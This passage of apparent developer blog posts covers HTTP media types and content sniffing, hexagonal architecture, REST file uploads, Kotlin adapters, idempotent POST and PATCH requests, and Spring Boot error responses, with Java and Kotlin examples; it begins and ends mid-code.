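    final String subtype;
    final String suffix; // null if the media type has no suffix
    final Map<String, String> parameters;

    private MediaTypeParts(String type, String subtype, String suffix, Map<String, String> parameters) {
        this.type = type;
        this.subtype = subtype;
        this.suffix = suffix;
        this.parameters = parameters;
    }

    static MediaTypeParts parse(String value) {
        String[] sections = value.split(";");
        String[] typeAndSubtype = sections[0].trim().split("/", 2);
        if (typeAndSubtype.length != 2) {
            throw new IllegalArgumentException("Not a media type: " + value);
        }
        String subtype = typeAndSubtype[1];
        String suffix = null;
        int plus = subtype.lastIndexOf('+');
        if (plus >= 0) {
            // e.g. "svg+xml" becomes subtype "svg" and suffix "xml"
            suffix = subtype.substring(plus + 1);
            subtype = subtype.substring(0, plus);
        }
        Map<String, String> parameters = new LinkedHashMap<>();
        for (int i = 1; i < sections.length; i++) {
            String[] nameAndValue = sections[i].trim().split("=", 2);
            if (nameAndValue.length == 2) {
                // parameter names are case-insensitive, so we store them in lower case
                parameters.put(nameAndValue[0].trim().toLowerCase(Locale.ROOT), nameAndValue[1].trim());
            }
        }
        return new MediaTypeParts(typeAndSubtype[0], subtype, suffix, parameters);
    }
}
```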

The Content-Type header

With HTTP any message that contains an entity-body should include a Content-Type header to define the media type of the body.

The RFC says:

Any HTTP/1.1 message containing an entity-body SHOULD include a Content-Type header field defining the media type of that body. If and only if the media type is not given by a Content-Type field, the recipient MAY attempt to guess the media type via inspection of its content and/or the name extension(s) of the URI used to identify the resource. If the media type remains unknown, the recipient SHOULD treat it as type "application/octet-stream".

The RFC allows clients to guess the media type if the Content-Type header is not present. However, clients should avoid doing so.

Guessing the media type of a piece of data is called content sniffing (or MIME sniffing). This practice was (and sometimes still is) used by web browsers and accounts for multiple security vulnerabilities. To explicitly tell browsers not to guess certain media types, the following header can be added:


X-Content-Type-Options: nosniff

Note that the Content-Type header always contains the media type of the original resource, before any content encoding is applied. Content encoding (like gzip compression) is indicated by the Content-Encoding header.
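
The two recommendations from this section (declare the media type, do not guess it) can be sketched in plain Java. ContentTypeHeaders and its method names are hypothetical. Only the header names and the application/octet-stream fallback come from the text above.

```java
import java.util.LinkedHashMap;
import java.util.Map;

// Hypothetical helper; only the header names and values come from the text above.
final class ContentTypeHeaders {
    static final String FALLBACK = "application/octet-stream";

    // Receiving side: trust the declared type and never inspect the body.
    static String declaredOrFallback(String contentTypeHeader) {
        if (contentTypeHeader == null || contentTypeHeader.trim().isEmpty()) {
            return FALLBACK;
        }
        return contentTypeHeader.trim();
    }

    // Sending side: always declare the media type and ask browsers not to sniff.
    static Map<String, String> forBody(String mediaType) {
        Map<String, String> headers = new LinkedHashMap<>();
        headers.put("Content-Type", mediaType);
        headers.put("X-Content-Type-Options", "nosniff");
        return headers;
    }
}
```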

From layers to onions and hexagons

2021-09-20T17:26:39Z

In this post we will explore the transition from a classic layered software architecture to a hexagonal architecture. The hexagonal architecture (also called ports and adapters architecture) is a design pattern to create loosely coupled application components.

This post was inspired by a German article from Silas Graffy called Von Schichten zu Ringen - Hexagonale Architekturen erklärt.

Classic layers

Layering is one of the most widely known techniques to break apart complicated software systems. It has been promoted in many popular books, like Patterns of Enterprise Application Architecture by Martin Fowler.

Layers allow us to build software on top of lower-level layers without knowing their details. In an ideal world, we can even replace lower-level layers with different implementations. While the number of layers can vary, we mostly see three or four layers in practice.

Here, we have an example diagram of a three layer architecture:

The presentation layer contains components related to user (or API) interfaces. In the domain layer we find the logic related to the problem the application solves. The database access layer is responsible for database interaction.

The dependency direction is from top to bottom. The code in the presentation layer depends on code in the domain layer, which in turn depends on code located in the database layer.

As an example we will examine a simple use-case: Creation of a new user. Let's add related classes to the layer diagram:

In the database layer we have a UserDao class with a saveUser(..) method that accepts a UserEntity class. UserEntity might contain methods required by UserDao for interacting with the database. With ORM-Frameworks (like JPA) UserEntity might contain information related to object-relational mapping.

The domain layer provides a UserService and a User class. Both might contain domain logic. UserService interacts with UserDao to save a User in the database. UserDao does not know about the User object, so UserService needs to convert User to UserEntity before calling UserDao.saveUser(..).

In the presentation layer we have a UserController class which interacts with the domain layer using the UserService and User classes. The presentation layer also has its own class to represent a user: UserDto might contain utility methods to format field values for presentation in a user interface.

What is the problem with this?

We have some potential problems to discuss here.

First we can easily get the impression that the database is the most important part of the system as all other layers depend on it. However, in modern software development we no longer start with creating huge ER-diagrams for the database layer. Instead, we usually (should) focus on the business domain.

As the domain layer depends on the database layer, the domain layer needs to convert its own objects (User) to objects the database layer knows how to use (UserEntity). So we have code that deals with database layer specific classes located in the domain layer. Ideally, we want the domain layer to focus on domain logic and nothing else.

The domain layer is directly using implementation classes from the database layer. This makes it hard to replace the database layer with different implementations. Even if we do not want to plan for replacing the database with a different storage technology this is important. Think of replacing the database layer with mocks for unit testing or using in-memory databases for local development.
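
A stripped-down sketch of the classic layering shows where the problems come from. The class names follow the description above. The name and email fields and the in-memory list that stands in for a real database are assumptions made for illustration.

```java
import java.util.ArrayList;
import java.util.List;

// --- database layer ---
class UserEntity {
    final String name;
    final String email;

    UserEntity(String name, String email) {
        this.name = name;
        this.email = email;
    }
}

class UserDao {
    // An in-memory list stands in for a real database table
    final List<UserEntity> rows = new ArrayList<>();

    void saveUser(UserEntity entity) {
        rows.add(entity);
    }
}

// --- domain layer ---
class User {
    final String name;
    final String email;

    User(String name, String email) {
        this.name = name;
        this.email = email;
    }
}

class UserService {
    // Direct dependency on a concrete class from the database layer
    private final UserDao userDao;

    UserService(UserDao userDao) {
        this.userDao = userDao;
    }

    void createUser(User user) {
        // Database-specific conversion code ends up in the domain layer
        UserEntity entity = new UserEntity(user.name, user.email);
        userDao.saveUser(entity);
    }
}
```

UserService cannot be compiled or tested without UserDao and UserEntity, which is exactly the coupling described above.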

Abstraction with interfaces

The last-mentioned problem can be solved by introducing interfaces. The obvious and quite common solution is to add an interface in the database layer. Higher level layers use the interface and do not depend on implementation classes.

Here we split the UserDao class into an interface (UserDao) and an implementation class (UserDaoImpl). UserService only uses the UserDao interface. This abstraction gives us more flexibility as we can now change UserDao implementations in the database layer.

However, from the layer perspective nothing changed. We still have code related to the database layer in our domain layer.

Now, we can do a little bit of magic by moving the interface into the domain layer:

Note we did not just move the UserDao interface. As UserDao is now part of the domain layer, it uses domain classes (User) instead of database related classes (UserEntity).

This little change reverses the dependency direction between the domain and database layers. The domain layer no longer depends on the database layer. Instead, the database layer depends on the domain layer as it requires access to the UserDao interface and the User class. The database layer is now responsible for the conversion between User and UserEntity.
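
In code, the reversed dependency could look roughly like this. It is a minimal sketch: the name and email fields and the in-memory list inside UserDaoImpl are assumptions, and a real implementation would talk to a database instead.

```java
import java.util.ArrayList;
import java.util.List;

// --- domain layer: owns the interface and only knows domain classes ---
class User {
    final String name;
    final String email;

    User(String name, String email) {
        this.name = name;
        this.email = email;
    }
}

interface UserDao {
    void saveUser(User user);
}

class UserService {
    private final UserDao userDao;

    UserService(UserDao userDao) {
        this.userDao = userDao;
    }

    void createUser(User user) {
        // No conversion and no database classes in the domain layer
        userDao.saveUser(user);
    }
}

// --- database layer: depends on the domain layer ---
class UserEntity {
    final String name;
    final String email;

    UserEntity(String name, String email) {
        this.name = name;
        this.email = email;
    }
}

class UserDaoImpl implements UserDao {
    // An in-memory list stands in for a real database table
    final List<UserEntity> rows = new ArrayList<>();

    @Override
    public void saveUser(User user) {
        // The conversion between User and UserEntity now lives here
        rows.add(new UserEntity(user.name, user.email));
    }
}
```

Because UserService only sees the interface, a unit test can pass in any other UserDao implementation, for example a lambda that collects the saved users in a list.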

In and out

While the dependency direction has been changed the call direction stays the same:

The domain layer is the center of the application. We can say that the presentation layer calls into the domain layer while the domain layer calls out to the database layer.

As a next step, we can split layers into more specific components. For example:

This is what hexagonal architecture (also called ports and adapters) is about.

We no longer have layers here. Instead, we have the application domain in the center and so-called adapters. Adapters provide additional functionality like user interfaces or database access. Some adapters call into the domain center (here: UI and REST API) while others are outgoing adapters called by the domain center via interfaces (here: database, message queue and e-mail).

This allows us to separate pieces of functionality into different modules/packages while the domain logic does not have any outside dependencies.

The onion architecture

From the previous step it is easy to move to the onion architecture (sometimes also called clean architecture).

The domain center is split into the domain model and domain services (sometimes called use cases). Application services contain incoming and outgoing adapters. On the outermost layer we locate infrastructure elements like databases or message queues.

What to remember?

We looked at the transition from a classic layered architecture to more modern architecture approaches. While the details of hexagonal architecture and onion architecture might vary, both share important parts:

The application domain is the core part of the application without any external dependencies. This allows easy testing and modification of domain logic.
Adapters located around the domain logic talk with external systems. These adapters can easily be replaced by different implementations without any changes to the domain logic.
The dependency direction always goes from the outside (adapters, external dependencies) to the inside (domain logic).
The call direction can be in and out of the domain center. At least for calling out of the domain center, we need interfaces to assure the correct dependency direction.

File down- and uploads in RESTful web services

2021-09-27T18:20:28Z

Usually we use standard data exchange formats like JSON or XML with REST web services. However, many REST services have at least some operations that can be hard to fulfill with just JSON or XML. Examples are uploads of product images, data imports using uploaded CSV files or generation of downloadable PDF reports.

In this post we focus on those operations, which are often categorized as file down- and uploads. This categorization is a bit fuzzy, as sending a simple JSON document can also be seen as a (JSON) file upload operation.

Think about the operation you want to express

A common mistake is to focus on the specific file format that is required for the operation. Instead, we should think about the operation we want to express. The file format just decides the Media Type used for the operation.

For example, assume we want to design an API that lets users upload an avatar image to their user account.

Here, it is usually a good idea to separate the avatar image from the user account resource for various reasons:

The avatar image is unlikely to change, so it might be a good candidate for caching. On the other hand, the user account resource might contain things like the last login date, which changes frequently.
Not all clients accessing the user account might be interested in the avatar image. So, bandwidth can be saved.
For clients it is often preferable to load images separately (think of web applications using <img> tags).

The user account resource might be accessible via:


/users/<user-id>

We can come up with a simple sub-resource representing the avatar image:


/users/<user-id>/avatar

Uploading an avatar is a simple replace operation which can be expressed via PUT:


PUT /users/<user-id>/avatar
Content-Type: image/jpeg

<image data>

In case a user wants to delete their avatar image, we can use a simple DELETE operation:


DELETE /users/<user-id>/avatar

And of course clients need a way to show the avatar image. So, we can provide a download operation with GET:


GET /users/<user-id>/avatar

which returns


HTTP/1.1 200 OK
Content-Type: image/jpeg

<image data>

In this simple example we use a new sub-resource with common update, delete, get operations. The only difference is we use an image media type instead of JSON or XML.
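
From a client's point of view, the three avatar operations could be built with the HTTP client that ships with Java 11 and later. AvatarRequests is a hypothetical helper and the base URL passed in is a placeholder. The sketch only builds the requests and does not send them.

```java
import java.net.URI;
import java.net.http.HttpRequest;

// Hypothetical helper that builds the three avatar requests shown above.
final class AvatarRequests {

    private static URI avatarUri(String baseUrl, String userId) {
        return URI.create(baseUrl + "/users/" + userId + "/avatar");
    }

    // PUT replaces the avatar; the media type describes the image format
    static HttpRequest upload(String baseUrl, String userId, byte[] jpegBytes) {
        return HttpRequest.newBuilder(avatarUri(baseUrl, userId))
                .header("Content-Type", "image/jpeg")
                .PUT(HttpRequest.BodyPublishers.ofByteArray(jpegBytes))
                .build();
    }

    // GET downloads the image data
    static HttpRequest download(String baseUrl, String userId) {
        return HttpRequest.newBuilder(avatarUri(baseUrl, userId))
                .header("Accept", "image/jpeg")
                .GET()
                .build();
    }

    // DELETE removes the avatar
    static HttpRequest delete(String baseUrl, String userId) {
        return HttpRequest.newBuilder(avatarUri(baseUrl, userId))
                .DELETE()
                .build();
    }
}
```

A request built this way can be sent with HttpClient.newHttpClient().send(request, HttpResponse.BodyHandlers.ofByteArray()).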

Let's look at a different example.

Assume we provide an API to manage product data. We want to extend this API with an option to import products from an uploaded CSV file. Instead of thinking about file uploads we should think about a way to express a product import operation.

Probably the simplest approach is to send a POST request to a separate resource:


POST /product-import
Content-Type: text/csv

<csv data>

Alternatively, we can also see this as a bulk operation for products. As we learned in another post about bulk operations with REST, the PATCH method is a possible way to express a bulk operation on a collection. In this case, the CSV document describes the desired changes to the product collection.

For example:


PATCH /products
Content-Type: text/csv

action,id,name,price
create,,Cool Gadget,3.99
create,,Nice cap,9.50
delete,42,,

This example creates two new products and deletes the product with id 42.
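
On the server side, the CSV body from the PATCH example could be turned into a list of change descriptions roughly like this. ProductChange and ProductCsvParser are hypothetical names. The sketch assumes the four columns from the example and does not support quoted fields or commas inside values.

```java
import java.util.ArrayList;
import java.util.List;

// One row of the CSV document: a desired change to the product collection
final class ProductChange {
    final String action;
    final String id;    // empty for "create"
    final String name;  // empty for "delete"
    final String price; // kept as text in this sketch

    ProductChange(String action, String id, String name, String price) {
        this.action = action;
        this.id = id;
        this.name = name;
        this.price = price;
    }
}

final class ProductCsvParser {

    static List<ProductChange> parse(String csv) {
        List<ProductChange> changes = new ArrayList<>();
        String[] lines = csv.split("\\R");
        // Start at 1 to skip the header line (action,id,name,price)
        for (int i = 1; i < lines.length; i++) {
            if (lines[i].trim().isEmpty()) {
                continue;
            }
            // The limit -1 keeps trailing empty columns, e.g. in "delete,42,,"
            String[] columns = lines[i].split(",", -1);
            if (columns.length != 4) {
                throw new IllegalArgumentException("Line " + (i + 1) + " must have 4 columns");
            }
            changes.add(new ProductChange(
                    columns[0].trim(), columns[1].trim(), columns[2].trim(), columns[3].trim()));
        }
        return changes;
    }
}
```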

Processing file uploads can take a considerable amount of time. So think about designing it as an asynchronous REST operation.

Mixing files and metadata

In some situations we might need to attach additional metadata to a file. For example, assume we have an API where users can upload holiday photos. Besides the actual image data a photo might also contain a description, a location where it was taken and more.

Here, I would (again) recommend using two separate operations for similar reasons as stated in the previous section with the avatar image. Even if the situation is a bit different here (the data is directly linked to the image) it is usually the simpler approach.

In this case, we can first create a photo resource by sending the actual image:


POST /photos
Content-Type: image/jpeg

<image data>

As response we get:


HTTP/1.1 201 Created
Location: /photos/123

After that, we can attach additional metadata to the photo:


PUT /photos/123/metadata
Content-Type: application/json

{
    "description": "Nice shot of a beach in hawaii",
    "location": "hawaii",
    "filename": "hawaii-beach.jpg"
}

Of course we can also design it the other way around and send the metadata before the image.

Embedding Base64 encoded files in JSON or XML

In case splitting file content and metadata into separate requests is not possible, we can embed files into JSON / XML documents using Base64 encoding. With Base64 encoding we can convert binary formats to a text representation which can be integrated in other text based formats, like JSON or XML.

An example request might look like this:


POST /photos
Content-Type: application/json

{
    "width": "1280",
    "height": "920",
    "filename": "funny-cat.jpg",
    "image": "TmljZSBleGFt...cGxlIHRleHQ="
}
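
Producing such a document is straightforward with the Base64 support in the Java standard library. PhotoPayload is a hypothetical helper. It builds the JSON by string concatenation to stay dependency-free and does not escape special characters, so a real application should use a JSON library instead. Keep in mind that Base64 increases the size of the data by roughly one third.

```java
import java.util.Base64;

// Hypothetical helper that embeds image bytes into a JSON document
final class PhotoPayload {

    static String toJson(String filename, int width, int height, byte[] imageBytes) {
        // Binary data becomes plain ASCII text that is safe inside a JSON string
        String image = Base64.getEncoder().encodeToString(imageBytes);
        return "{\n"
                + "    \"width\": \"" + width + "\",\n"
                + "    \"height\": \"" + height + "\",\n"
                + "    \"filename\": \"" + filename + "\",\n"
                + "    \"image\": \"" + image + "\"\n"
                + "}";
    }

    // The receiver reverses the encoding to get the original bytes back
    static byte[] decodeImage(String base64) {
        return Base64.getDecoder().decode(base64);
    }
}
```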

Mixing media-types with multipart requests

Another possible approach to transfer image data and metadata in a single request / response is to use multipart media types.

Multipart media types require a boundary parameter that is used as delimiter between different body parts. The following request consists of two body parts. The first one contains the image while the second part contains the metadata.

For example:


POST /photos
Content-Type: multipart/mixed; boundary=foobar

--foobar
Content-Type: image/jpeg

<image data>
--foobar
Content-Type: application/json

{
    "width": "1280",
    "height": "920",
    "filename": "funny-cat.jpg"
}
--foobar--

Unfortunately multipart requests / responses are often hard to work with. For example, not every REST client might be able to construct these requests and it can be hard to verify responses in unit tests.
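
To give an impression of what a client has to do, here is a minimal sketch that assembles the body of the multipart/mixed request shown above by hand. MultipartMixedBody is a hypothetical helper. It assumes that the boundary string does not occur inside any of the parts, which real code has to guarantee.

```java
import java.io.ByteArrayOutputStream;
import java.nio.charset.StandardCharsets;

// Hypothetical helper that builds a two-part multipart/mixed body
final class MultipartMixedBody {

    static byte[] build(String boundary, byte[] imageBytes, String metadataJson) {
        ByteArrayOutputStream out = new ByteArrayOutputStream();

        // First part: the binary image data
        writeAscii(out, "--" + boundary + "\r\n");
        writeAscii(out, "Content-Type: image/jpeg\r\n\r\n");
        out.write(imageBytes, 0, imageBytes.length);

        // Second part: the JSON metadata
        writeAscii(out, "\r\n--" + boundary + "\r\n");
        writeAscii(out, "Content-Type: application/json\r\n\r\n");
        byte[] json = metadataJson.getBytes(StandardCharsets.UTF_8);
        out.write(json, 0, json.length);

        // The closing delimiter carries two extra hyphens at the end
        writeAscii(out, "\r\n--" + boundary + "--\r\n");
        return out.toByteArray();
    }

    private static void writeAscii(ByteArrayOutputStream out, String text) {
        byte[] bytes = text.getBytes(StandardCharsets.US_ASCII);
        out.write(bytes, 0, bytes.length);
    }
}
```

The resulting byte array is sent as the request body together with the header Content-Type: multipart/mixed; boundary=foobar (using the same boundary value that was passed to build(..)).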

Interested in more REST related articles? Have a look at my REST API design page.

Kotlin: Type conversion with adapters

2021-12-14T15:20:13Z

In this post we will learn how we can use Kotlin extension functions to provide a simple and elegant type conversion mechanism.

Maybe you have used Apache Sling before. In this case, you are probably familiar with Sling's usage of adapters. We will implement a very similar approach in Kotlin.

Creating an extension function

With Kotlin's extension functions we can add methods to existing classes. The following declaration adds an adaptTo() method to all subtypes of Any.


inline fun <reified T : Any> Any.adaptTo(): T {
    TODO("implemented in the following sections")
}

The generic parameter T specifies the target type that should be returned by the method. We leave the method body unimplemented for the moment.

Converting an object of type A to another object of type B will look like this with our new method:


val a = A("foo")
val b = a.adaptTo<B>()

Providing conversion rules with adapters

In order to implement the adaptTo() method we need a way to define conversion rules.

We use a simple Adapter interface for this:


import kotlin.reflect.KClass

interface Adapter {
    fun <T : Any> canAdapt(from: Any, to: KClass<T>): Boolean
    fun <T : Any> adaptTo(from: Any, to: KClass<T>): T
}

canAdapt(..) returns true when the implementing class is able to convert the from object to type to.

adaptTo(..) performs the actual conversion and returns an object of type to.

Searching for an appropriate adapter

Our adaptTo() extension function needs a way to access available adapters. So, we create a simple list that stores our adapter implementations:


val adapters = mutableListOf<Adapter>()

Within the extension function we can now search the adapters list for a suitable adapter:


inline fun <reified T : Any> Any.adaptTo(): T {
    val adapter = adapters.find { it.canAdapt(this, T::class) }
            ?: throw NoSuitableAdapterFoundException(this, T::class)
    return adapter.adaptTo(this, T::class)
}

class NoSuitableAdapterFoundException(from: Any, to: KClass<*>)
    : Exception("No suitable adapter found to convert $from to type $to")

If an adapter is found that can be used for the requested conversion we call adaptTo(..) of the adapter and return the result. In case no suitable adapter is found a NoSuitableAdapterFoundException is thrown.

Example usage

Assume we want to convert JSON strings to Kotlin objects using the Jackson JSON library. A simple adapter might look like this:


class JsonToObjectAdapter : Adapter {
    private val objectMapper = ObjectMapper().registerModule(KotlinModule())

    override fun <T : Any> canAdapt(from: Any, to: KClass<T>) = from is String

    override fun <T : Any> adaptTo(from: Any, to: KClass<T>): T {
        require(canAdapt(from, to))
        return objectMapper.readValue(from as String, to.java)
    }
}

Now we can use our new extension method to convert a JSON string to a Person object:


data class Person(val name: String, val age: Int)

fun main() {
    // register available adapter at application start
    adapters.add(JsonToObjectAdapter())

    ...
    
    // actual usage
    val json = """
        {
            "name": "John",
            "age" : 42
        }
    """.trimIndent()

    val person = json.adaptTo<Person>()
}

You can find the source code of the examples on GitHub.

Within adapters.kt you find all the required pieces in case you want to try this on your own. In example-usage.kt you find some adapter implementations and usage examples.

Making POST and PATCH requests idempotent

2021-06-13T18:10:46Z

In an earlier post about idempotency and safety of HTTP methods we learned that idempotency is a positive API feature. It helps make an API more fault-tolerant as a client can safely retry a request in case of connection problems.

The HTTP specification defines GET, HEAD, OPTIONS, TRACE, PUT and DELETE methods as idempotent. Of these methods, GET, PUT and DELETE are the ones that are usually used in REST APIs. Implementing GET, PUT and DELETE in an idempotent way is typically not a big problem.

POST and PATCH are a bit different: neither of them is specified as idempotent. However, both can be implemented with idempotency in mind, making it easier for clients in case of problems. In this post we will explore different options to make POST and PATCH requests idempotent.

Using a unique business constraint

The simplest approach to provide idempotency when creating a new resource (usually expressed via POST) is a unique business constraint.

For example, consider we want to create a user resource which requires a unique email address:


POST /users

{
    "name": "John Doe",
    "email": "john@doe.com"
}

If this request is accidentally sent twice by the client, the second request returns an error because a user with the given email address already exists. In this case, usually HTTP 400 (bad request) or HTTP 409 (conflict) is returned as status code.

Note that the constraint used to provide idempotency does not have to be part of the request body. URI parts and relationships can also help form a unique constraint.

A good example for this is a resource that relates to a parent resource in a one-to-one relation. For example, assume we want to pay an order with a given order-id.

The payment request might look like this:


POST /order/<order-id>/payment

{
    ... (payment details)
}

An order can only be paid once so /payment is in a one-to-one relation to its parent resource /order/<order-id>. If there is already a payment present for the given order, the server can reject any further payment attempts.
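
The core of this approach is an atomic "insert if absent" check on the unique value. The following sketch uses the email example from above with an in-memory map. UserRegistry is a hypothetical class, and in a real application a unique constraint in the database would usually take over this role.

```java
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

// Hypothetical in-memory stand-in for a user table with a unique email column
final class UserRegistry {
    private final Map<String, String> namesByEmail = new ConcurrentHashMap<>();

    /** Returns the HTTP status code a POST /users handler might respond with. */
    int createUser(String name, String email) {
        // putIfAbsent is atomic, so two concurrent duplicates cannot both succeed
        String existing = namesByEmail.putIfAbsent(email, name);
        return existing == null ? 201 : 409;
    }
}
```

Sending the same request twice creates the user once: the first call returns 201, the repeated call returns 409.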

Using ETags

Entity tags (ETags) are a good approach to make update requests idempotent. ETags are generated by the server based on the current resource representation. The ETag is returned within the ETag header value. For example:

Request


GET /users/123

Response


HTTP/1.1 200 OK
ETag: "a915ecb02a9136f8cfc0c2c5b2129c4b"

{
    "name": "John Doe",
    "email": "john@doe.com"
}

Now assume we want to use a JSON Merge Patch request to update the user's name:


PATCH /users/123
Content-Type: application/merge-patch+json
If-Match: "a915ecb02a9136f8cfc0c2c5b2129c4b"

{
    "name": "John Smith"
}

We use the If-Match condition to tell the server only to execute the request if the ETag matches. Updating the resource leads to an updated ETag on the server side. So, if the request is accidentally sent twice, the server rejects the second request because the ETag no longer matches. Usually HTTP 412 (precondition failed) should be returned in this case.

I explained ETags in a bit more detail in my post about avoiding issues with concurrent updates.

Obviously ETags can only be used if the resource already exists. So this solution cannot be used to ensure idempotency when a resource is created. On the plus side, this is a standardized and very well understood approach.
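
The If-Match check itself fits into a few lines of plain Java. VersionedResource is a hypothetical class. The ETag is derived from a SHA-256 hash of the representation here, which is only one of several ways a server might generate it, and update(..) replaces the whole body instead of applying a real merge patch.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

// Hypothetical resource holder that performs a conditional update
final class VersionedResource {
    private String body;

    VersionedResource(String body) {
        this.body = body;
    }

    // The ETag changes whenever the representation changes
    synchronized String etag() {
        return "\"" + sha256Hex(body) + "\"";
    }

    /** Returns 412 if the If-Match value is stale, otherwise updates and returns 200. */
    synchronized int update(String ifMatch, String newBody) {
        if (!etag().equals(ifMatch)) {
            return 412; // precondition failed, nothing is changed
        }
        body = newBody;
        return 200;
    }

    private static String sha256Hex(String text) {
        try {
            byte[] digest = MessageDigest.getInstance("SHA-256")
                    .digest(text.getBytes(StandardCharsets.UTF_8));
            StringBuilder hex = new StringBuilder();
            for (byte b : digest) {
                hex.append(String.format("%02x", b));
            }
            return hex.toString();
        } catch (NoSuchAlgorithmException e) {
            // SHA-256 has to be available on every Java platform
            throw new IllegalStateException(e);
        }
    }
}
```

If a client sends the same update twice with the ETag it received earlier, the first call returns 200 and the second returns 412, because the stored representation and therefore the ETag have changed in between.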

Using a separate idempotency key

Yet another approach is to use a separate client generated key to provide idempotency. In this way the client generates a key and adds it to the request using a custom header (e.g. Idempotency-Key).

For example, a request to create a new user might look like this:


POST /users
Idempotency-Key: 1063ef6e-267b-48fc-b874-dcf1e861a49d

{
    "name": "John Doe",
    "email": "john@doe.com"
}

Now the server can persist the idempotency key and reject any further requests using the same key.

There are two questions to think about with this approach:

How should we deal with requests that have not been completed successfully (e.g. requests answered with HTTP 4xx or 5xx status codes)? Should the idempotency key be saved by the server in these cases? If so, clients always need to use a new idempotency key if they want to retry requests.
What should be returned if the server receives a request with an already known idempotency key?

Personally, I tend to save the idempotency key only if the request finished successfully. In the second case, I would return HTTP 409 (conflict) to indicate that a request with the given idempotency key has already been executed.

However, opinions can be different here. For example, the Stripe API makes use of an Idempotency-Key header. Stripe saves the idempotency key and the returned response in all cases. If a provided idempotency key is already present, the stored response gets returned without executing the operation again.

The latter can confuse the client in my opinion. On the other hand, it gives the client the option to retrieve the response of a previously executed request again.
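
The first variant (keep the key only for successful requests and answer repeats with HTTP 409) could be sketched like this. IdempotencyGuard is a hypothetical class that keeps keys in memory. It reserves the key while the operation is running, so a duplicate that arrives in the meantime is rejected as well. This is a design choice of the sketch, not something the approach prescribes.

```java
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import java.util.function.IntSupplier;

// Hypothetical guard that remembers idempotency keys of successful requests
final class IdempotencyGuard {
    private final Set<String> usedKeys = ConcurrentHashMap.newKeySet();

    /** Runs the operation unless the key is already known; returns the HTTP status. */
    int execute(String idempotencyKey, IntSupplier operation) {
        // add() is atomic: only the first caller with a given key gets true
        if (!usedKeys.add(idempotencyKey)) {
            return 409;
        }
        int status;
        try {
            status = operation.getAsInt();
        } catch (RuntimeException e) {
            usedKeys.remove(idempotencyKey); // failed, allow a retry with the same key
            throw e;
        }
        if (status >= 400) {
            usedKeys.remove(idempotencyKey); // failed, allow a retry with the same key
        }
        return status;
    }
}
```

A server following the Stripe-style variant would store the response next to the key and return the stored response instead of 409.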

Summary

A simple unique business key can be used to provide idempotency for operations that create resources.

For non-creating operations we can use server generated ETags combined with the If-Match header. This approach has the advantage of being standardized and widely known.

As an alternative we can use a client generated idempotency key provided in a custom request header. The server saves those idempotency keys and rejects requests that contain an already used idempotency key. This approach can be used for all types of requests. However, it is not standardized and has some points to think about.


Providing useful API error messages with Spring Boot

2021-05-30T23:42:08Z

For API users it is quite important that an API provides useful error messages. Otherwise, it can be hard to figure out why things do not work. Debugging what's wrong can quickly become a larger effort for the client than actually implementing useful error responses on the server side. This is especially true if clients are not able to solve the problem themselves and additional communication is required.

Nonetheless this topic is often ignored or implemented halfheartedly.

Client and security perspectives

There are different perspectives on error messages. Detailed error messages are more helpful for clients while, from a security perspective, it is preferable to expose as little information as possible. Luckily those two views often do not conflict that much, when implemented correctly.

Clients are usually interested in very specific error messages if the error is produced by them. This should usually be indicated by a 4xx status code. Here, we need specific messages that point to the mistake made by the client without exposing any internal implementation detail.

On the other hand, if the client request is valid and the error is produced by the server (5xx status codes), we should be conservative with error messages. In this case, the client is not able to solve the problem and therefore does not require any details about the error.

A response indicating an error should contain at least two things: a human readable message and an error code. The first one helps the developer who sees the error message in the log file. The latter allows specific error processing on the client (e.g. showing a specific error message to the user).

How to build a useful error response in a Spring Boot application?

Assume we have a small application in which we can publish articles. A simple Spring controller to do this might look like this:


@RestController
public class ArticleController {

    @Autowired
    private ArticleService articleService;

    @PostMapping("/articles/{id}/publish")
    public void publishArticle(@PathVariable ArticleId id) {
        articleService.publishArticle(id);
    }
}

Nothing special here, the controller just delegates the operation to a service, which looks like this:


@Service
public class ArticleService {

    @Autowired
    private ArticleRepository articleRepository;

    public void publishArticle(ArticleId id) {
        Article article = articleRepository.findById(id)
                .orElseThrow(() -> new ArticleNotFoundException(id));

        if (!article.isApproved()) {
            throw new ArticleNotApprovedException(article);
        }

        ...
    }
}

Inside the service we throw specific exceptions for possible client errors. Note that those exceptions do not just describe the error. They also carry information that might help us later to produce a good error message:


public class ArticleNotFoundException extends RuntimeException {
    private final ArticleId articleId;

    public ArticleNotFoundException(ArticleId articleId) {
        super(String.format("No article with id %s found", articleId));
        this.articleId = articleId;
    }
    
    // getter
}

If the exception is specific enough we do not need a generic message parameter. Instead, we can define the message inside the exception constructor.

Next we can use an @ExceptionHandler method in a @ControllerAdvice bean to handle the actual exception:


@ControllerAdvice
public class ArticleExceptionHandler {

    @ExceptionHandler(ArticleNotFoundException.class)
    public ResponseEntity<ErrorResponse> onArticleNotFoundException(ArticleNotFoundException e) {
        String message = String.format("No article with id %s found", e.getArticleId());
        return ResponseEntity
                .status(HttpStatus.NOT_FOUND)
                .body(new ErrorResponse("ARTICLE_NOT_FOUND", message));
    }
    
    ...
}

If controller methods throw exceptions, Spring tries to find a method annotated with a matching @ExceptionHandler annotation. @ExceptionHandler methods can have flexible method signatures, similar to standard controller methods. For example, we can add an HttpServletRequest parameter and Spring will pass in the current request object. Possible parameters and return types are described in the Javadocs of @ExceptionHandler.

In this example, we create a simple ErrorResponse object that consists of an error code and a message.

The message is constructed based on the data carried by the exception. It is also possible to pass the exception message to the client. However, in this case we need to make sure everyone in the team is aware of this and exception messages do not contain sensitive information. Otherwise, we might accidentally leak internal information to the client.

ErrorResponse is a simple POJO used for JSON serialization:


public class ErrorResponse {
    private final String code;
    private final String message;

    public ErrorResponse(String code, String message) {
        this.code = code;
        this.message = message;
    }

    // getter
}
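
The distinction between specific client errors and conservative server errors can also be shown without Spring. The following framework-free sketch is an illustration only: MappedError and ErrorMapper are hypothetical names, the article id is simplified to a String, and the INTERNAL_ERROR code is an assumption.

```java
// Simplified variant of the exception above, using a String id
class ArticleNotFoundException extends RuntimeException {
    final String articleId;

    ArticleNotFoundException(String articleId) {
        super("No article with id " + articleId + " found");
        this.articleId = articleId;
    }
}

// Status code, error code and message that are sent to the client
final class MappedError {
    final int status;
    final String code;
    final String message;

    MappedError(int status, String code, String message) {
        this.status = status;
        this.code = code;
        this.message = message;
    }
}

final class ErrorMapper {

    static MappedError toError(RuntimeException e) {
        if (e instanceof ArticleNotFoundException) {
            // Client error: specific message built from the data carried by the exception
            String id = ((ArticleNotFoundException) e).articleId;
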